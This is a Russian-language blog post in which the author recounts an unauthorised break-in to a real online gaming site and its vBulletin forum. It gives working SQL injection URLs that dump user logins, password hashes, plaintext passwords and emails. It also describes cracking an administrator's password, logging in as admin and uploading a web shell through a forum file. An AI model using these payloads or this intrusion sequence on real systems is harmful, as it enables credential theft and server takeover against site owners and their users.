Прошло около 2 месяцев после взлома апофига.
И тут я вспомнил один старенький проект,который когда то посещал— cyberfight - им и занялись.
Первое что обнаружили
Раскрытие локальных путей.
cup.c58*ру/live/index.php?tourney=17%27
Информацию о версии php.
сайберфайт*ру/test.php
Информацию об данном Apache сервере.
сайберфайт*ру/_info
Прошло ещё не много времени и была найдена SQL Инъекция,которая сулила нечто большоечем инфа о серваке.)
сайберфайт*ру/_moderate/demo.php?cat_id=55&demo_id=29951+order+by+1–+
Получили доступ к таблце user.
http://cyberfight.ru/_post/0-preview.php?text_id=63647+union+select+concat_ws%280x3a,user_id,user_login,user_password,user_email%29,2,3,4,5,6,7+from+user+limit+1,1–+
Пароли зашифрованы алгоритмом Des(Unix). Расшифровав пароль одного из администраторов,пытались залить шелл,но без успешно.В единственном месте где не было фильтра для расширений(заливка демок),получилась вот такая картина.
Стоит отдать должное администрации киберфайта.Права на сервере выставлены грамотно.
Решили взяться за форум.
Движком форума являлся старый добрый vBulletin 2 ветки.
сайберфайт*ру/_post/0-preview.php?text_id=-1+union+select+concat%28username,0x7c,password,0x7c,email,0x7c,icq%29,2,3,4,5,6,7+from+forum.user+limit+0,1–+
Пароли хранятся в открытом виде….Залогинившись под админом,в админку попасть мы не смогли.Причиной наверняка являлось ограничение по ip.Думав что делать дальше,до меня дошло что не давно взломанный cybernn.ru использует тот же движок что и киберфайт.
Изучив структуру двига,мы обнаружили файл serializator.php в корне(скрина нету.) Через него шелл и был залит,подробностей тут не требуется.
Вот так то. В каждой сложности,есть своя простота. |
Комментарии могут писать только авторизированные пользователи |
|
 |
